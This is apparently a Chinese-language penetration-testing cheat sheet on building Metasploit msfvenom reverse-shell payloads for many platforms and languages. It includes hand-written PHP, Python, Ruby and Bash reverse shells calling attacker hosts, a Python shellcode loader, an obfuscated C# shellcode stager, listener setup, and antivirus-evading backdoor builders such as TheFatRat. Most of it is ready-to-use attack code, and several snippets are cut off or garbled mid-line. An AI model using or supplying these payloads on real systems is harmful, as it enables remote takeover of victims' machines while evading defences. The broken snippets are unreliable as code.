0x00 前言 参考 参考Micro8系列第十课:https://micro8.gitbook.io/micro8/contents-1/1-10/10msfvenom-chang-yong-sheng-cheng-payload-ming-ling
参考Micro8系列第十四课:https://micro8.gitbook.io/micro8/contents-1/11-20/14-ji-yu-di-shi-ke-bu-chong-payload1
参考Micro8系列第十五课:https://micro8.gitbook.io/micro8/contents-1/11-20/15-ji-yu-di-shi-ke-bu-chong-payload2
msfvenom命令参数说明 msfvenom命令中文使用说明:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 Options: -p, --payload <payload> 使用指定的payload --payload-options 列出该payload参数 -l, --list [type ] 列出所有的payloads -n, --nopsled <length> 为payload指定一个 nopsled 长度 -f, --format <format> 指定payload生成格式 --help -formats 查看所有支持格式 -e, --encoder <encoder> 使用编码器 -a, --arch <arch> 指定payload构架 --platform <platform> 指定payload平台 --help -platforms 显示支持的平台 -s, --space <length> 设定payload攻击荷载的最大长度 --encoder-space <length> The maximum size of the encoded payload (defaults to the -s value) -b, --bad-chars <list> 指定bad-chars 如: '\x00\xff' -i, --iterations <count> 指定编码次数 -c, --add-code <path> 指定个win32 shellcode 文件 -x, --template <path> 指定一个 executable 文件作为模板 -k, --keep payload自动分离并注入到新的进程 -o, --out <path> 存放生成的payload -v, --var-name <name> 指定自定义变量 --smallest Generate the smallest possible payload -h, --help 显示帮助文件
0x01 Windows 1 msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe
0x02 Mac 1 msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.macho
0x03 Android 1 2 //需要签名 msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk
0x04 PowerShell 1 msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
0x05 Linux 1 msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o payload.elf
0x06 PHP 1 2 msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
下面补充一些绕过用的payload。
开启监听:
1 2 3 4 5 msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.107 LHOST => 192.168.1.107
payload1,这个并不全:
1 2 3 4 5 6 <? php error_reporting(0 ); $ip = 'x.x.x.x' ; $port = 53 ; if (($f = 'stream_socket_client' ) && is_callable($f)) { {$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_ strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('s >
payload2:
1 2 3 <?php $sock=fsockopen("xx.xx.xx.xx" ,xx);exec("/bin/sh -i <&3 >&3 2>&3" ); ?>
0x07 ASPX 1 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx
0x08 JSP 1 msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.jsp
0x09 WAR 1 msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw - o payload.war
0x0A NodeJS 1 msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.js
0x0B Python 1 msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.py
下面补充一些绕过用的payload。
开启监听:
1 2 3 4 5 msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.107 LHOST => 192.168.1.107
payload1:
1 2 3 4 5 6 7 8 9 10 11 12 import socket,struct,timefor x in range(10 ): try : s=socket.socket(2 ,socket.SOCK_STREAM) s.connect(('x.x.x.x' ,xx)) break except : time.sleep(5 ) l=struct.unpack('>I' ,s.recv(4 ))[0 ] d=s.recv(l) while len(d)<l: d+=s.recv(l-len(d)) exec(d,{'s' :s})
payload2,这个并不全:
1 2 3 import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xx.xx.xx.xx" ,xx)); i"]);
payload3:
1 2 3 4 5 6 7 8 9 10 11 12 import socketimport subprocesss=socket.socket() s.connect(("xx.xx.xx.xx" ,xx)) while 1 : p = subprocess.Popen(s.recv(1024 ), shell=True , stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.send(p.stdout.read() + p.stderr.read() )
删除特征:
1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=8.8.8.8 LPORT=88 -f c | tr -d '"' | tr -d '\n'
接着将上述命令生成的payload放入Python的payload中:
1 2 3 4 5 6 from ctypes import *reverse_shell = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72 micropoorshell = create_string_buffer(reverse_shell, len(reverse_shell)) shellcode = cast(micropoorshell, CFUNCTYPE(c_void_p)) shellcode()
0x0C Perl 1 msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.pl
0x0D Ruby 1 msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb
下面补充一些绕过用的payload。
payload1:
1 2 require 'socket' ;c=TCPSocket.new("xx.xx.xx.xx" , x);$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdi(IO.popen(l,"rb" ){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }
payload2:
1 require 'socket' ;f=TCPSocket.open("xx.xx.xx.xx" ,xx).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d" ,f,f,f)
payload3:
1 require 'socket' ;c=TCPSocket.new("xx.xx.xx.xx" ,"xx" );while (cmd=c.gets);IO.popen(cmd,"r" ){|io| c.print io.read}end
payload4:
1 c=TCPSocket.new("xx.xx.xx.xx" ,"xx" );while (cmd=c.gets);IO.popen(cmd,"r" ){\|io\| c.print io.read}end
0x0E Lua 1 msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.lua
0x0F Windows Shellcode 1 msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c
0x10 Linux Shellcode 1 msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c
0x11 Mac Shellcode 1 msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c
0x12 Bash 1 msfvenom -p cmd/unix/reverse_bash LHOST=xx.xx..xx.xx LPORT=xx > -f raw > payload.sh
payload1:
1 i >& /dev/tcp/xx.xx.xx.xx/xx 0>&1
payload2:
1 2 exec 5<>/dev/tcp/xx.xx.xx.xx/xxcat <&5 | while read line; do $line 2>&5 >&5;done
0x13 C 开启监听:
1 2 3 4 5 msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.107 LHOST => 192.168.1.107
混淆payload:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices; using System. namespace RkfCHtll { class LiNGeDokqnEH { static byte[] idCWVw(string VVUUJUQytjlL, int eMcukOUqFuHbUv) { IPEndPoint nlttgWAMdEQgAo = new IPEndPoint(IPAddress.Parse(VVUUJUQytjlL), eMcukOUqFuHbUv); Socket fzTiwdk = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); try { fzTiwdk.Connect(nlttgWAMdEQgAo);} catch { return null;} byte[] gJVVagJmu = new byte[4]; fzTiwdk.Receive(gJVVagJmu, 4, 0); int GFxHorfhzft = BitConverter.ToInt32(gJVVagJmu, 0); byte[] mwxyRsYNn = new byte[GFxHorfhzft + 5]; int yVcZAEmXaMszAc = 0; while (yVcZAEmXaMszAc < GFxHorfhzft) { yVcZAEmXaMszAc += fzTiwdk.Receive(mwxyRsYNn,yVcZAEmXaMszAc + 5, (GFxHorfhzft - yVcZAEmXaMszAc) < 4096 byte[] XEvFDc = BitConverter.GetBytes((int)fzTiwdk.Handle); Array.Copy(XEvFDc, 0, mwxyRsYNn, 1, 4); mwxyRsYNn[0] = 0xBF; return mwxyRsYNn;} static void hcvPkmyIZ(byte[] fPnfqu) { if (fPnfqu != null) { UInt32 hcoGPUltNcjK = VirtualAlloc(0,(UInt32)fPnfqu.Length, 0x1000, 0x40); Marshal.Copy(fPnfqu, 0, (IntPtr)(hcoGPUltNcjK), fPnfqu.Length); IntPtr xOxEPnqW = IntPtr.Zero; UInt32 ooiiZLMzO = 0; IntPtr wxPyud = IntPtr.Zero; xOxEPnqW = CreateThread(0, 0, hcoGPUltNcjK, wxPyud, 0, ref ooiiZLMzO); WaitForSingleObject(xOxEPnqW, 0xFFFFFFFF); }} static void Main(){ byte[] dCwAid = null; dCwAid = idCWVw("xx.xx.xx.xx", xx); hcvPkmyIZ(dCwAid); } [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 qWBbOS,UInt32 HoKzSHMU, UInt [DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 tqUXybrozZ, UInt32 FMmVpwin, UInt32 H [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr CApwDwK, UInt32 uzGJUddCYTd);
0x14 相关payload生成工具 TheFatRat 项目地址: https://github.com/Screetsec/TheFatRat
TheFatRat是一款使用各种payload编译可在Linux、Windows、Mac和Android上执行的恶意软件的渗透利用工具。TheFatRat提供了一种轻松创建后门和有效payload的方法,可以绕过大多数的防病毒软件。
TheFatRat具有以下特点:
全自动化使用MSFvenom和Metasploit;
生成本地或远程监听器;
按照类型轻松地创建操作系统后门;
生成各种格式的payload;
绕过反病毒后门;
可用于增加文件大小的文件泵;
能够检测外部IP和接口地址;
自动创建用于USB/CDROM利用的AutoRun文件;
下载安装:
1 2 3 4 git clone https://github.com/Screetsec/TheFatRat.git cd TheFatRat-master/chmod +x setup.sh ./setup.sh
MSFvenom Payload Creator (MSFPC) 项目地址:https://github.com/g0tmi1k/mpc
MSFPC是一个可以简化msfvenom命令各种参数使用的工具,本质就是个shell脚本,基于msfvenom命令来快速生成各种类型的Meterpreter payload。